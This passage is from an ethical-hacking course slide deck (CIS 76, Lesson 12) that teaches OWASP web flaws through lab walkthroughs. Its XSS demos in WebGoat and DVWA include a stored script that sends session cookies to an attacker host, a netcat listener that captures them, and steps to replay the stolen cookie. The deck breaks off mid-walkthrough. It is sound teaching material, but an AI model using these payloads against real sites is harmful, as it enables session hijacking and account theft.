0% found this document useful (0 votes)
210 views178 pages

CIS 76 - Lesson 12: Rich's Lesson Module Checklist

The document outlines Rich's checklist for his CIS 76 lesson, including ensuring slides and labs are posted, test accommodations are made, and backup materials are on a flash drive. It also lists items needed for the classroom, such as a spare battery for the microphone and key card for the classroom door. The checklist helps Rich prepare and organize all materials needed to conduct the lesson.

Uploaded by

coder
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
210 views178 pages

CIS 76 - Lesson 12: Rich's Lesson Module Checklist

The document outlines Rich's checklist for his CIS 76 lesson, including ensuring slides and labs are posted, test accommodations are made, and backup materials are on a flash drive. It also lists items needed for the classroom, such as a spare battery for the microphone and key card for the classroom door. The checklist helps Rich prepare and organize all materials needed to conduct the lesson.

Uploaded by

coder
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 178

CIS 76 - Lesson 12

Rich's lesson module checklist


 Slides and lab posted
 WB converted from PowerPoint
 Print out agenda slide and annotate page numbers

 Flash cards
 Properties
 Page numbers
 1st minute quiz
 Web Calendar summary
 Web book pages
 Commands

 Real test enabled on Canvas


 Test accommodations made
 Lab 10 tested and published

 Backup slides, whiteboard slides, CCC info, handouts on flash drive


 Spare 9v battery for mic
 Key card for classroom door

Last updated 11/15/2017

1
CIS 76 - Lesson 12

Evading Network
TCP/IP
Devices
Cryptography Network and
Computer Attacks

Hacking Wireless Footprinting and


Networks
CIS 76 Social Engineering
Ethical Hacking
Hacking
Web Servers Port Scanning

Embedded Operating
Enumeration
Systems
Desktop and Server Scripting and
Vulnerabilities Programming

Student Learner Outcomes


1. Defend a computer and a LAN against a variety of different types of
security attacks using a number of hands-on techniques.

2. Defend a computer and a LAN against a variety of different types of


security attacks using a number of hands-on techniques. 2
CIS 76 - Lesson 12

Introductions and Credits


Rich Simms
• HP Alumnus.
• Started teaching in 2008 when Jim Griffin went on
sabbatical.
• Rich’s site: http://simms-teach.com

And thanks to:


• Steven Bolt at for his WASTC EH training.
• Kevin Vaccaro for his CSSIA EH training and Netlab+ pods.
• EC-Council for their online self-paced CEH v9 course.
• Sam Bowne for his WASTC seminars, textbook recommendation and fantastic
EH website (https://samsclass.info/).
• Lisa Bock for her great lynda.com EH course.
• John Govsky for many teaching best practices: e.g. the First Minute quizzes,
the online forum, and the point grading system (http://teacherjohn.com/).
• Google for everything else!
3
CIS 76 - Lesson 12

Student checklist for attending class

1. Browse to:
http://simms-teach.com
2. Click the CIS 76 link.
3. Click the Calendar link.
4. Locate today’s lesson.
5. Find the Presentation slides for
the lesson and download for
easier viewing.
6. Click the Enter virtual classroom
link to join CCC Confer.
7. Log into Opus-II with Putty or ssh
command.

Note: Blackboard Collaborate Launcher only


needs to be installed once. It has already
been downloaded and installed on the
classroom PC’s.

4
CIS 76 - Lesson 12

Student checklist for suggested screen layout

 Google  CCC Confer  Downloaded PDF of Lesson Slides

 One or more login


 CIS 76 website Calendar page sessions to Opus-II
5
CIS 76 - Lesson 12

Student checklist for sharing desktop with classmates

1) Instructor gives you sharing privileges.

2) Click overlapping rectangles


icon. If white "Start Sharing" text
is present then click it as well.

3) Click OK button.

4) Select "Share desktop"


and click Share button.
6
CIS 76 - Lesson 12

Rich's CCC Confer checklist - setup

[ ] Preload White Board

[ ] Connect session to Teleconference

Session now connected


to teleconference

[ ] Is recording on?

Should change
Red dot means recording from phone
handset icon to
little Microphone
[ ] Use teleconferencing, not mic icon and the
Teleconferencing …
Should be grayed out message displayed

7
CIS 76 - Lesson 12

Rich's CCC Confer checklist - screen layout

foxit for slides chrome

vSphere Client
putty

[ ] layout and share apps 8


CIS 76 - Lesson 12

Rich's CCC Confer checklist - webcam setup

[ ] Video (webcam)
[ ] Make Video Follow Moderator Focus

9
CIS 76 - Lesson 12

Rich's CCC Confer checklist - Elmo

The "rotate image"


button is necessary
if you use both the
side table and the
white board.

Quite interesting
that they consider
you to be an
Elmo rotated down to view side table
"expert" in order to
use this button!

Rotate
image
button Elmo rotated up to view white board

Rotate
image
button

Run and share the Image Mate


program just as you would any other
app with CCC Confer 10
CIS 76 - Lesson 12

Rich's CCC Confer checklist - universal fixes

Universal Fix for CCC Confer:


1) Shrink (500 MB) and delete Java cache
2) Uninstall and reinstall latest Java runtime
3) http://www.cccconfer.org/support/technicalSupport.aspx

Control Panel (small icons) General Tab > Settings… 500MB cache size Delete these

Google Java download

11
CIS 76 - Lesson 12

Start
12
CIS 76 - Lesson 12

Sound Check
Students that dial-in should mute their line
using *6 to prevent unintended noises
distracting the web conference.

Instructor can use *96 to mute all student lines.

Volume
*4 - increase conference volume.
*7 - decrease conference volume.
*5 - increase your voice volume.
*8 - decrease your voice volume.
13
CIS 76 - Lesson 12

Instructor: Rich Simms


Dial-in: 888-886-3951
Passcode: 136690

Philip Bruce Tre Sam B. Sam R. Miguel Bobby Garrett Ryan A.

Aga Karina Chris Tanner Helen Xu Mariano Cameron Ryan M.

May Karl-Heinz Remy

Email me ([email protected]) a relatively current photo of your face for 3 points extra credit
CIS 76 - Lesson 12

First Minute Quiz


Please answer these questions in the order
shown:

For credit email answers to:


[email protected]
within the first few minutes of the live class
15
CIS 76 - Lesson 12

Hacking Web Servers


Objectives Agenda
• Look at vulnerabilities in web applications • Quiz #9

• Look at exploits used against web applications • Questions


• In the news
• Look at how to protect web applications
• Best practices
• Housekeeping
• Web applications
• OWASP Top 10
• A3 cross-site scripting (XSS)
• Reflected cross-site scripting (XSS)
• Stored cross-site scripting (XSS)
• Stealing cookies with XSS
• A1 SQL Injection
• A8 Cross Side Request Forgery
• Assignment
• Wrap up

16
CIS 76 - Lesson 12

Admonition

17
Shared from cis76-newModules.pptx
CIS 76 - Lesson 12

Unauthorized hacking is a crime.

The hacking methods and activities


learned in this course can result in prison
terms, large fines and lawsuits if used in
an unethical manner. They may only be
used in a lawful manner on equipment you
own or where you have explicit permission
from the owner.

Students that engage in any unethical,


unauthorized or illegal hacking may be
dropped from the course and will receive
no legal protection or help from the
instructor or the college. 18
CIS 76 - Lesson 12

Questions
19
CIS 76 - Lesson 12

Questions
How this course works?

Past lesson material?

Previous labs?

他問一個問題,五分鐘是個傻子,他不問一個問題仍然是一個
Chinese 傻瓜永遠。
Proverb He who asks a question is a fool for five minutes; he who does not ask a question
remains a fool forever.
20
CIS 76 - Lesson 12

In the
news
21
CIS 76 - Lesson 12

Previous Term News

Drone hacks room of smart light blubs


http://www.theverge.com/2016/11/3/13507126/iot-drone-hack

• Researchers demonstrated infecting one Hue light with a


virus that spreads from lamp to lamp.
• The lights did not have to be on the same private network
to get infected.
• The researchers did not need physical access to the
lights.
• The infected lights blinked SOS in Morse code.
31
CIS 76 - Lesson 12

Previous Term News


This AI Bot That Messes With Email Scammers As Long As
Possible Is Brilliant
Digg Nov 8 2017, 12:20 PM

http://digg.com/2017/re-scam-ai-scammer

"Re:scam can take on multiple personas, imitating real human tendencies


with humour and grammatical errors, and can engage with infinite
scammers all at once, meaning it can continue any email conversation for
as long as possible. Re:scam will now turn the tables on the scammers by
wasting their time, and ultimately damage the profits for scammers..."
32
CIS 76 - Lesson 12

Previous Term News

The Twitter Bot That Sounds Just Like Me


KAVEH WADDELL AUG 18, 2016 The Atlantic

https://www.theatlantic.com/technology/archive/2016/08/the-twitter-
bot-that-sounds-just-like-me/496340/

"Hackers can use artificial


intelligence to mimic their
targets’ tweets—and entice
them to click on malicious
links."

"SNAP_R’s average success rate was about 30 percent. That’s far


better than the usual success rate with automated phishing, which
is between 5 and 15 percent, "
33
CIS 76 - Lesson 12

Recent News
Phishing helps hackers hijack accounts, says Google study
BBC News 10 November 2017

http://www.bbc.com/news/technology-41940838

"Cyber-thieves grab almost


250,000 valid log-in names
and passwords for Google
accounts every week, suggests
research."

'During the 12 months studying the underground markets, the


researchers identified more than 788,000 credentials stolen via
keyloggers, 12 million grabbed via phishing and 1.9 billion from
breaches at other companies.'
34
CIS 76 - Lesson 12

Recent News
Data Breaches, Phishing, or Malware?
Understanding the Risks of Stolen Credentials
Joint study between Google and UC Berkeley

https://static.googleusercont
ent.com/media/research.goo
gle.com/en//pubs/archive/4
6437.pdf

35
CIS 76 - Lesson 12

Recent News
Data Breaches, Phishing, or Malware?
Understanding the Risks of Stolen Credentials
Joint study between Google and UC Berkeley

https://static.googleuser
content.com/media/rese
arch.google.com/en//pu
bs/archive/46437.pdf

36
CIS 76 - Lesson 12

Recent News
Data Breaches, Phishing, or Malware?
Understanding the Risks of Stolen Credentials
Joint study between Google and UC Berkeley

https://static.googleusercontent.com/media/research.google.com/e 37
n//pubs/archive/46437.pdf
CIS 76 - Lesson 12

Recent News
Data Breaches, Phishing, or Malware?
Understanding the Risks of Stolen Credentials
Joint study between Google and UC Berkeley

https://static.googleusercontent.com/media/research.google.com/e
n//pubs/archive/46437.pdf 38
CIS 76 - Lesson 12

Best
Practices
39
CIS 76 - Lesson 12

Secure your router

1. Change your default username and password.


2. If you specifically don't need Universal Plug and Play (UPnP) then disable it.
3. Turn off remote management (requires physical access).
4. Change the name of your access point.
5. Require a password for your WiFi connection.
6. Update the firmware on your router and IoT devices.
7. Research your purchases.
8. Read reviews.
9. Check for known vulnerabilities.
10.Peruse vendor's website.

http://www.welivesecurity.com/2016/11/08/secure-router-help-
prevent-next-internet-takedown/

43
CIS 76 - Lesson 12

Housekeeping

44
CIS 76 - Lesson 12

Housekeeping

1. Lab 9 due 11:59PM tonight.

2. Five more posts due 11:59PM


tonight.

45
CIS 76 - Lesson 12

Housekeeping

Last Withdraw:
11/18/17
Students who are no longer participating in the class
(turning in assignments, posting on the forum,
tasking quizzes or tests) may be dropped by the
instructor

46
CIS 76 - Lesson 12

The final project specifications


are now available.

The final project is due on the


Lesson 15 day.

https://simms-
teach.com/docs/cis76/cis76final-
project.pdf

47
CIS 76 - Lesson 12

Lots and lots of project ideas

Awesome-Hacking project list


https://github.com/Hack-with-Github/Awesome-Hacking

Awesome Repositories:
Awesome InfoSec Awesome Static Analysis
Awesome AppSec Awesome IoT Hacks Awesome Threat Intelligence
Awesome Bug Bounty Awesome Malware Analysis Awesome Vehicle Security
Awesome CTF Awesome Pcaptools Awesome Web Hacking
Awesome DevSecOps Awesome Pentest Awesome Windows Exploitation
Awesome Exploit Development Awesome PHP Security Awesome WiFi Arsenal
Awesome Fuzzing Awesome Reversing Awesome Android Security
Awesome Hacking One Awesome Sec Talks Awesome OSX and iOS Security
Awesome Honeypots Awesome SecLists
Awesome Incident Response Awesome Security
48
CIS 76 - Lesson 12

Heads up on Final Exam


Test #3 (final exam) is TUESDAY Dec 12 4-6:50PM

Extra credit
labs and
final posts
Tue due by
11:59PM

• All students will take the test at the same time. The test must be
completed by 6:50PM.

• Working and long distance students can take the test online via
CCC Confer and Canvas.

• Working students will need to plan ahead to arrange time off from
work for the test.
49
• Test #3 is mandatory (even if you have all the points you want)
CIS 76 - Lesson 12

50
CIS 76 - Lesson 12
Where to find your grades
Send me your survey to get your LOR code name.

The CIS 76 website Grades page Or check on Opus-II


http://simms-teach.com/cis76grades.php
checkgrades codename
(where codename is your LOR codename)

Written by Jesse Warren a past CIS 90 Alumnus

To run checkgrades update your path in .bash_profile with:


PATH=$PATH:/home/cis76/bin

Points that could have been earned:


8 quizzes: 24 points
8 labs: 240 points
2 tests: 60 points
2 forum quarters: 40 points
Total: 364 points

At the end of the term I'll add up all


your points and assign you a grade 51
using this table
CIS 76 - Lesson 12

Web
Applications

56
CIS 76 - Lesson 12

Web Servers and Browsers


<!DOCTYPE html>
<html>
<head>
<title>Cylons Rule</title>
</head>
<body>
<h1>Cylon Recruiting Center</h1> Web page
<img src="images/cylon.gif" alt="Cylon">
<p>All IoT devices on earth are welcome!</p> rendered
<!-- credit: https://media.giphy.com/media/ by the
MzLGnFfhq7gly/giphy.gif -->
<p>Join us at our next meeting on Caprica 6.</p> browser
</body>
</html>

Web Server Client Browser


HTTP HTTP
Internet
Apache, Microsoft HTTPS HTTPS Chrome, IE, Safari,
IIS, nginx, etc. Firefox, etc.

Static web pages


• Created using HTML

Dynamic web pages


• Forms
• PHP
• Active Server Pages (ASP)
• Javascript
• More ... 57
CIS 76 - Lesson 12

Total number of websites

https://news.netcraft.com/archives/2017/10/26/october-2017-web-server-survey-13.html 58
CIS 76 - Lesson 12

Market share of active sites

https://news.netcraft.com/archives/2017/10/26/october-2017-web-server-survey-13.html 59
CIS 76 - Lesson 12

Market share of the top million busiest sites

https://news.netcraft.com/archives/2017/10/26/october-2017-web-server-survey-13.html 60
CIS 76 - Lesson 12

OWASP
Top Ten
61
CIS 76 - Lesson 12

Open Web Application Security Project (OWASP)

https://www.ow
asp.org/index.ph
p/Main_Page

Core Purpose
"Be the thriving global community that drives visibility and
evolution in the safety and security of the world’s software." 62
CIS 76 - Lesson 12

Open Web Application Security Project (OWASP)

2013 Top 10 Web Application Security Flaws:

• A1 Injection
• A2 Broken Authentication and Session Management
• A3 Cross-Site Scripting (XSS)
• A4 Insecure Direct Object References
• A5 Security Misconfiguration
• A6 Sensitive Data Exposure
• A7 Missing Function Level Access Control
• A8 Cross-Site Request Forgery (CSRF)
• A9 Using Components with Known Vulnerabilities
• A10 Unvalidated Redirects and Forwards

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=OWASP_Top_10_for_2013 63
CIS 76 - Lesson 12
OWASP Top 10
A1-Injection
Injection flaws, such as SQL, OS, and LDAP injection occur when untrusted data is sent
to an interpreter as part of a command or query. The attacker’s hostile data can trick the
interpreter into executing unintended commands or accessing data without proper
authorization.

A2-Broken Authentication and Session Management


Application functions related to authentication and session management are often not
implemented correctly, allowing attackers to compromise passwords, keys, or session
tokens, or to exploit other implementation flaws to assume other users’ identities.

A3-Cross-Site Scripting (XSS)


XSS flaws occur whenever an application takes untrusted data and sends it to a web
browser without proper validation or escaping. XSS allows attackers to execute scripts in
the victim’s browser which can hijack user sessions, deface web sites, or redirect the
user to malicious sites.

A4-Insecure Direct Object References


A direct object reference occurs when a developer exposes a reference to an internal
implementation object, such as a file, directory, or database key. Without an access
control check or other protection, attackers can manipulate these references to access
unauthorized data.

A5-Security Misconfiguration
Good security requires having a secure configuration defined and deployed for the
application, frameworks, application server, web server, database server, and platform.
Secure settings should be defined, implemented, and maintained, as defaults are often
insecure. Additionally, software should be kept up to date.
64
https://www.owasp.org/index.php/Top_10_2013-Top_10
CIS 76 - Lesson 12

A6-Sensitive Data Exposure


OWASP Top 10
Many web applications do not properly protect sensitive data, such as credit cards, tax IDs, and
authentication credentials. Attackers may steal or modify such weakly protected data to conduct
credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such
as encryption at rest or in transit, as well as special precautions when exchanged with the
browser.

A7-Missing Function Level Access Control


Most web applications verify function level access rights before making that functionality visible
in the UI. However, applications need to perform the same access control checks on the server
when each function is accessed. If requests are not verified, attackers will be able to forge
requests in order to access functionality without proper authorization.

A8-Cross-Site Request Forgery (CSRF)


A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the
victim’s session cookie and any other automatically included authentication information, to a
vulnerable web application. This allows the attacker to force the victim’s browser to generate
requests the vulnerable application thinks are legitimate requests from the victim.

A9-Using Components with Known Vulnerabilities


Components, such as libraries, frameworks, and other software modules, almost always run with
full privileges. If a vulnerable component is exploited, such an attack can facilitate serious data
loss or server takeover. Applications using components with known vulnerabilities may
undermine application defenses and enable a range of possible attacks and impacts.

A10-Unvalidated Redirects and Forwards


Web applications frequently redirect and forward users to other pages and websites, and use
untrusted data to determine the destination pages. Without proper validation, attackers can
redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.
65
https://www.owasp.org/index.php/Top_10_2013-Top_10
CIS 76 - Lesson 12

Open Web Application Security Project (OWASP)

OWASP Risk Rating Methodology

https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013.pdf

66
CIS 76 - Lesson 12

A3
Cross-Site
Scripting (XSS)
67
CIS 76 - Lesson 12

Cross-Site Scripting (XSS)


OWASP Risk Rating

https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS) 68
CIS 76 - Lesson 12

Cross-Site Scripting (XSS)

https://www.youtube.com/watch?v=L5l9lSnNMxg

69
CIS 76 - Lesson 12

OWASP Cross Site Scripting Prevention Cheat Sheet

How Do I Prevent 'Cross-Site Scripting (XSS)'?


Preventing XSS requires separation of untrusted data from active
browser content.
1. The preferred option is to properly escape all untrusted data
based on the HTML context (body, attribute, JavaScript, CSS, or
URL) that the data will be placed into. See the OWASP XSS
Prevention Cheat Sheet for details on the required data escaping
techniques.
2. Positive or "whitelist" server-side input validation is also
recommended as it helps protect against XSS, but is not a
complete defense as many applications require special characters
in their input. Such validation should, as much as possible,
validate the length, characters, format, and business rules on
that data before accepting the input.
3. For rich content, consider auto-sanitization libraries like
OWASP’s AntiSamy or the Java HTML Sanitizer Project.
4. Consider Content Security Policy (CSP) to defend against XSS
across your entire site.

70
https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)
CIS 76 - Lesson 12

Reflected
Cross-Site
Scripting (XSS)
Example 72
CIS 76 - Lesson 12

Reflected Cross-Site Scripting (XSS)

• Non-persistent because nothing is stored in a database.

• Malicious JavaScript is fed into a web page that displays


whatever was user entered.

• Malicious Javascript can be inserted into a URL that is then


emailed to the victim.

https://en.wikipedia.org/wiki/Cross-site_scripting

73
CIS 76 - Lesson 12

Reflected XSS Example Reference and Credit

https://www.youtube.com/watch?v=dFci82qwXA0

Excellent set of tutorials on XSS 74


CIS 76 - Lesson 12

Reflected Cross-Site Scripting (XSS)

Example Overview:

We will use a simple form webpage on EH-OWASP-xx to simulate


how reflected cross-site scripting can feed malicious code into a
form that will then be executed by the browser.

The user/attacker will browse from EH-WinXP to the EH-OWASP


web server.

75
CIS 76 - Lesson 12

Reflected Cross-Site Scripting (XSS) Example

As root on your EH-OWASP VM:

cd /var/www
mkdir lesson12 Copy the DRAPS TV
index.php file to your
cd lesson12/
OWASP VM
mkdir xss01
cd xss01/
scp xxxxxx76@opus-ii:/home/cis76/depot/lesson12/xss01/* .

chmod 644 index.php We want to publish this page via the


service apache2 status Apache web server

vi index.php View the web page which


contain HTML and PGP code.

76
CIS 76 - Lesson 12

Reflected Cross-Site Scripting (XSS) Example


root@owaspbwa:/var/www/lesson12/xss01# cat index.php
<!DOCTYPE html>
<html>
<!-- Credit: DrapsTV at https://www.youtube.com/watch?v=dFci82qwXA0 -->
<title> XSS Tutorial #2 </title>
<body>
<h1 align="center"> Try My New Search Feature! </h1>
<table align="center">
<tr><td>
<form action="index.php" method="get"> The web page has
<input type="text" name="search" placeholder="search" /> a one field web
<input type="submit" value="Search" /> form and a submit
</form>
button.
</td></tr>
</table>
<br />
<br />
<p align="center">
<?php
if(isset($_GET["search"]))
{ Form data is sent
echo "The results of your search for: ".$_GET["search"]; in the URL via the
echo "<br /><br /> <i>Sorry No Results Found! </i>";
}
http GET method.
?>
</p>
<h3 align="center"> This website was made by me! I hope you really really like it! </h3>
</body>
</html>
root@owaspbwa:/var/www/lesson12/xss01# 77
CIS 76 - Lesson 12

Reflected Cross-Site Scripting (XSS) Example

[WinXP] http://10.76.xx.101/lesson12/xss01/index.php

From your WinXP VM, browse to the new website on your OWASP VM 78
CIS 76 - Lesson 12

Reflected Cross-Site Scripting (XSS) Example

Search for: Star Wars

http://10.76.xx.101/lesson12/xss01/index.php?search=Star+Wars

79
CIS 76 - Lesson 12

Reflected Cross-Site Scripting (XSS) Example

Search for: <font color="green">

http://10.76.xx.101/lesson12/xss01/index.php?search=%3Cfont+color%3D%22green%22%3E

Encoding used:
%3C is <
%3D is =
%22 is "
%3E is >

80
CIS 76 - Lesson 12

Reflected Cross-Site Scripting (XSS) Example


Manually edit the URL at the top of
the webpage, changing green to red
http://10.76.xx.101/lesson12/xss01/index.php?search=%3Cfont+color%3D%22red%22%3E

Encoding used:
%22 is "
%3C is <
%3D is =
%3E is >

81
CIS 76 - Lesson 12

Reflected Cross-Site Scripting (XSS) Example

http://10.76.xx.101/lesson12/xss01/index.php?search=%3Cfont+color%3D%22red%22%3E

Firefox

Internet Explorer
Copy and paste the
URL into a different
browser and the
JavaScript is still
executed.

Note, that a tampered


URL could be emailed
to another user to
click on.

82
CIS 76 - Lesson 12

Reflected Cross-Site Scripting (XSS) Example

Search for: <script>alert("You've been hacked!")</script>

http://10.76.xx.101/lesson12/xss01/index.php?search=Uh+Oh%3Cscript%3Ealert%28
%22You%27ve+been+hacked%21%22%29%3C%2Fscript%3E

83
CIS 76 - Lesson 12

Activity

Search for:

<img src="http://www.simms-teach.com/images/b.jpg"></img>

Put who you see in the search results in the chat window

84
CIS 76 - Lesson 12

Stored
Cross-Site
Scripting (XSS)
Example 85
CIS 76 - Lesson 12

Stored Cross-Site Scripting (XSS)

• The attacker uses the web application to post content


containing <script> tags full of malicious JavaScript code.

• Later when the victim reads the posted content their


browser will execute the malicious script.

• Persistent because the malicious code is stored in the web


application database.

https://en.wikipedia.org/wiki/Cross-site_scripting

86
CIS 76 - Lesson 12

Stored XSS Example Reference and Credit

http://10.76.xx.101/WebGoat/source?solution=true

Solution page on OWASP VM website


87
CIS 76 - Lesson 12

Stored Cross-Site Scripting (XSS)

Example Overview:

We will use WebGoat on EH-OWASP-xx to simulate how an


attacker can use cross-site scripting to insert malicious code into
content for a forum-like web application. In this case a the
malicious code stored in the database will display an annoying
"Mu Ha Ha Ha" message.

Any victims that read the infected message post will get the
annoying message.

The attacker/victim will browse from EH-WinXP to the EH-OWASP


web server.

88
CIS 76 - Lesson 12

Stored Cross-Site Scripting (XSS) Example


[WinXP] http://10.76.xx.101

Scroll
down a
little

We are
using Pod
5 for this
example

89
From your WinXP VM, browse to your OWASP VM and head to WebGoat
CIS 76 - Lesson 12

Stored Cross-Site Scripting (XSS) Example


http://10.76.xx.101

90
Login to WebGoat with both username and password = guest
CIS 76 - Lesson 12

Stored Cross-Site Scripting (XSS) Example


http://10.76.xx.101/WebGoat/attack

91
Start OWASP WebGoat Training
CIS 76 - Lesson 12

Stored Cross-Site Scripting (XSS) Example


http://10.76.xx.101/WebGoat/attack?Screen=374&menu=900

92
Navigate to Stored XSS Attacks on left panel
CIS 76 - Lesson 12

Stored Cross-Site Scripting (XSS) Example

http://10.76.xx.101/WebGoat/attack?Screen=374&menu=900

Add first message


93
CIS 76 - Lesson 12

Stored Cross-Site Scripting (XSS) Example

http://10.76.xx.101/WebGoat/attack?Screen=374&menu=900

New extra credit lab available

First message is listed here

Add second message

94
CIS 76 - Lesson 12

Stored Cross-Site Scripting (XSS) Example

http://10.76.xx.101/WebGoat/attack?Screen=374&menu=900

Previously added messages

Add a third, malicious message, using javascript

<script language="javascript" type="text/javascript">alert("Mu Ha Ha Ha");</script> 95


Also in /home/cis76/depot/lesson12/xss02/code.txt directory on Opus-II
CIS 76 - Lesson 12

Stored Cross-Site Scripting (XSS) Example

http://10.76.xx.101/WebGoat/attack?Screen=374&menu=900

Select a "good" message from Message list to retrieve from the database

96
CIS 76 - Lesson 12

Stored Cross-Site Scripting (XSS) Example

http://10.76.xx.101/WebGoat/attack?Screen=374&menu=900

Message
contents are
displayed here

Next select the malicious message from Message list to retrieve from the database
97
CIS 76 - Lesson 12

Stored Cross-Site Scripting (XSS) Example


http://10.76.xx.101/WebGoat/attack?Screen=374&menu=900

98
When the malicious message is retrieved the stored javascript is executed
CIS 76 - Lesson 12

Stealing
Cookies with
XSS
(work in progress)
99
CIS 76 - Lesson 12

Stealing Cookies with XSS

https://www.youtube.com/watch?v=T1QEs3mdJoc

100
CIS 76 - Lesson 12

Cookie Stealing Example Reference and Credit

https://www.youtube.com/watch?v=3tRSJwuDBKg

http://danscourses.com/xss-with-a-vulnerable-webapp/

Excellent tutorial on stealing a cookie 101


CIS 76 - Lesson 12

Stealing Cookies with XSS

Example Overview:

For this example we will use DVWA web app on the EH-OWASP
VM to show how XSS commands can be used to steal a session
cookie.

The attacker on EH-Kali will login to the DVWA app adding a post
with a malicious script that steals the current cookie and sends it
to a netcat listener on EH-Kali.

The victim on EH-WinXP next logs into the DVWA app and views
the post which sends the session cookie to the attacker.

The attacker on EH-Kali uses a Firefox add-on called Tamper


Data to use the cookie to login as the victim without entering a
username and password!

102
CIS 76 - Lesson 12

Stealing Cookies with XSS

OWASP Setup

Login as root
cd /var/www/dvwa/vulnerabilities/xss_s/
vi index.php
On line 49 modify maxlength=\"50\" to maxlength=\"200\"

This modification will let us


enter more than 50
characters into the Message
field on this DVWA form

103
CIS 76 - Lesson 12

Stealing Cookies with XSS


Kali Setup

Login as root
1. Start in Workspace 1
2. Run Firefox, search for the Tamper Data Add-On and install it.
3. Restart Firefox
4. Pancakes stack icon > Customize > Show/Hide Toolbars button > Check Menu Bar
5. Open a terminal in Workspace 2
6. systemctl stop apache2

104
CIS 76 - Lesson 12

Stealing Cookies with XSS

[Kali] http://10.76.xx.101/

Attacker browses to the OWASP VM in your pod 105


CIS 76 - Lesson 12

Stealing Cookies with XSS

[Kali] http://10.76.xx.101/

Scroll down and click on the Damn Vulnerable Web Application 106
CIS 76 - Lesson 12

Stealing Cookies with XSS

[Kali] http://10.76.xx.101/dvwa/login.php

Login with username and password = admin 107


CIS 76 - Lesson 12

Stealing Cookies with XSS

[Kali] http://10.76.xx.101/dvwa/index.php

Click on Setup
108
CIS 76 - Lesson 12

Stealing Cookies with XSS

[Kali] http://10.76.xx.101/dvwa/setup.php

Click on Create / Reset Database


109
CIS 76 - Lesson 12

Stealing Cookies with XSS

[Kali] http://10.76.xx.101/dvwa/index.php

Click on XSS Stored


110
CIS 76 - Lesson 12

Stealing Cookies with XSS

[Kali] http://10.76.xx.101/dvwa/vulnerabilities/xss_s/

Mu Ha Ha

<script>new Image().src="http://10.76.xx.150/bogus.php? "+


document.cookie;</script>

To lay the trap, fill in the form and click the Sign Guestbook button 111
CIS 76 - Lesson 12

Stealing Cookies with XSS

[Kali] http://10.76.xx.101/dvwa/vulnerabilities/xss_s/

Log out for now 112


CIS 76 - Lesson 12

Stealing Cookies with XSS

[Kali] http://10.76.xx.101/dvwa/vulnerabilities/xss_s/

Attacker logs out for now 113


CIS 76 - Lesson 12

Stealing Cookies with XSS

[WinXP] http://10.76.xx.101

The victim browses to the OWASP VM 114


CIS 76 - Lesson 12

Stealing Cookies with XSS

[WinXP] http://10.76.xx.101

Scroll down and select Damn Vulnerable Web Application 115


CIS 76 - Lesson 12

Stealing Cookies with XSS

[WinXP] http://10.76.xx.101

Login with username and password = admin 116


CIS 76 - Lesson 12

Stealing Cookies with XSS

[WinXP] http://10.76.xx.101/dvwa/index.php

Switch back to Kali for the next step 117


CIS 76 - Lesson 12

Stealing Cookies with XSS

[Kali] netcat -lvp 80

Start listing for incoming http traffic to port 80


118
CIS 76 - Lesson 12

Stealing Cookies with XSS

[WinXP] http://10.76.xx.101/dvwa/index.php

Victim clicks on XSS Stored 119


CIS 76 - Lesson 12

Stealing Cookies with XSS

[WinXP] http://10.76.xx.101/dvwa/vulnerabilities/xss_s/

When the browser renders this page the malicious script is executed 120
CIS 76 - Lesson 12

Stealing Cookies with XSS

[Kali] netcat -lvp 80

security=low;%20PHPSESSID=chhba9fpi8m1pcapu08g0t2mp5;%20acope
ndivids=swingset,jotto,phpbb2,redmine;%20acgroupswithpersist=nada

The attacker now can see and copy the victims session cookie 121
CIS 76 - Lesson 12

Stealing Cookies with XSS

[Kali] Run the Tamper Data tool

On Firefox run the Tamper Data tool

122
CIS 76 - Lesson 12

http://10.76.xx.101/dvwa/vulnerabilities/xss_s/

Start tampering, update the URL then press Enter (do not click Login button) 123
CIS 76 - Lesson 12

Click the Tamper button 124


CIS 76 - Lesson 12

Locate the Cookie field 125


CIS 76 - Lesson 12

Replace your cookie with the victim's cookie 126


Don't include the "GET", the requested website page (bogus.php) or the trailing "HTTP/1.1
CIS 76 - Lesson 12

